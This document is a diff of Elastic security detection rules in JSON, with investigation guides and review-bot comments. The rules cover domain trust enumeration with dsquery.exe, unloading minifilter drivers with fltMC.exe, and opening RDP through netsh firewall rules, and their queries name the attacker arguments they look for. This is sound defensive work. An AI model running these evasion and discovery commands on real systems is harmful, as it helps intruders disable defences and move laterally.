"0678bc9c-b71a-433b-87e6-2f664b6b3131", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "0678bc9c-b71a-433b-87e6-2f664b6b3131_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_7.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_7.json new file mode 100644 index 00000000000..3495c0323e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_7.json 
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of dsquery.exe for domain trust discovery purposes. Adversaries may use this command-line utility to enumerate trust relationships that may be used for Lateral Movement opportunities in Windows multi-domain forest environments.", + "false_positives": [ + "Domain administrators may use this command-line utility for legitimate information gathering purposes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumerating Domain Trusts via DSQUERY.EXE", + "note": "## Triage and analysis\n\n### Investigating Enumerating Domain Trusts via DSQUERY.EXE\n\nActive Directory (AD) domain trusts define relationships between domains within a Windows AD environment. In this setup, a \"trusting\" domain permits users from a \"trusted\" domain to access resources. These trust relationships can be configurable as one-way, two-way, transitive, or non-transitive, enabling controlled access and resource sharing across domains.\n\nThis rule identifies the usage of the `dsquery.exe` utility to enumerate domain trusts. Attackers can use this information to enable the next actions in a target environment, such as lateral movement.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation and are done within the user business context (e.g., an administrator in this context). As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Enumerating Domain Trusts via NLTEST.EXE - 84da2554-e12a-11ec-b896-f661ea17fbcd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"dsquery.exe\" or ?process.pe.original_file_name: \"dsquery.exe\") and \n process.args : \"*objectClass=trustedDomain*\"\n", + "references": [ + "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952(v=ws.11)", + "https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "06a7a03c-c735-47a6-a313-51c354aef6c3", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "06a7a03c-c735-47a6-a313-51c354aef6c3_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_109.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_109.json new file mode 100644 index 00000000000..5a3a8ece1e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_109.json 
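Review bot: The `Response and remediation` section of `note` includes `Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.`, but this rule's `query` matches `dsquery.exe` and never references PowerShell, so that step does not follow from the alert and looks carried over from another guide. Suggest either dropping it or rewording it to `Restrict the use of Active Directory query tools such as dsquery.exe to administrative accounts and hosts using GPOs, AppLocker, Intune, or similar software.` so the remediation matches what the rule detects.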
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Filter Manager Control Program (fltMC.exe) binary may be abused by adversaries to unload a filter driver and evade defenses.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Evasion via Filter Manager", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. 
Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\" and\n not\n (\n (\n process.executable : \"?:\\\\Program Files (x86)\\\\ManageEngine\\\\UEMS_Agent\\\\bin\\\\DCFAService64.exe\" and\n process.args : (\"DFMFilter\", \"DRMFilter\")\n ) or\n (\n process.executable : \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\" and\n process.args : (\"BrFilter_*\", \"BrCow_*\") and\n user.id : \"S-1-5-18\"\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ 
+ { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_110.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_110.json new file mode 100644 index 00000000000..e34f5d3ccfa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_110.json 
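Review bot: Both exclusions in the `query`'s `not ( ... )` block are keyed on a `process.executable` path plus `process.args` (the second additionally on `user.id`), with nothing tying the excluded process to its publisher; for a defense-evasion rule whose purpose is to catch an unloaded minifilter, a path-only allowlist is the weakest form of exclusion. Consider anchoring each exclusion on the code signature as well, e.g. adding `?process.code_signature.trusted == true and ?process.code_signature.subject_name : "<vendor subject name, to confirm>"` beside each `process.executable` clause, with the `?` prefix used elsewhere in this diff because `logs-system.security*` events will not carry those fields, and listing them under `required_fields`. The same query appears unchanged in the `_110` file in the next hunk, which differs from this one only by narrowing the index pattern to `logs-endpoint.events.process-*`, so the change applies there too.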
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Filter Manager Control Program (fltMC.exe) binary may be abused by adversaries to unload a filter driver and evade defenses.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Evasion via Filter Manager", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. 
Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\" and\n not\n (\n (\n process.executable : \"?:\\\\Program Files (x86)\\\\ManageEngine\\\\UEMS_Agent\\\\bin\\\\DCFAService64.exe\" and\n process.args : (\"DFMFilter\", \"DRMFilter\")\n ) or\n (\n process.executable : \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\" and\n process.args : (\"BrFilter_*\", \"BrCow_*\") and\n user.id : \"S-1-5-18\"\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ 
+ { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_109.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_109.json new file mode 100644 index 00000000000..14b81b434c2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_109.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the network shell utility (netsh.exe) to enable inbound Remote Desktop Protocol (RDP) connections in the Windows Firewall.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Desktop Enabled in Windows Firewall by Netsh", + "note": "## Triage and analysis\n\n### Investigating Remote Desktop Enabled in Windows Firewall by Netsh\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts.\n\nThis rule detects the creation of a Windows Firewall inbound rule that would allow inbound RDP traffic using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- The `netsh.exe` utility can be used legitimately. Check whether the user should be performing this kind of activity, whether the user is aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or ?process.pe.original_file_name == \"netsh.exe\") and\n process.args : (\"localport=3389\", \"RemoteDesktop\", \"group=\\\"remote desktop\\\"\") and\n process.args : (\"action=allow\", \"enable=Yes\", \"enable\")\n", + "related_integrations": [ + { + "package": 
"endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "074464f9-f30d-4029-8c03-0ed237fffec7_109", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_110.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_110.json new file mode 100644 index 00000000000..04b267f9d5f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_110.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the network shell utility (netsh.exe) to enable inbound Remote Desktop Protocol (RDP) connections in the Windows Firewall.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Desktop Enabled in Windows Firewall by Netsh", + "note": "## Triage and analysis\n\n### Investigating Remote Desktop Enabled in Windows Firewall by Netsh\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts.\n\nThis rule detects the creation of a Windows Firewall inbound rule that would allow inbound RDP traffic using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- The `netsh.exe` utility can be used legitimately. Check whether the user should be performing this kind of activity, whether the user is aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or ?process.pe.original_file_name == \"netsh.exe\") and\n process.args : (\"localport=3389\", \"RemoteDesktop\", \"group=\\\"remote desktop\\\"\") and\n process.args : (\"action=allow\", \"enable=Yes\", \"enable\")\n", + "related_integrations": [ + { + "package": 
"endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "074464f9-f30d-4029-8c03-0ed237fffec7_110", + "type": 
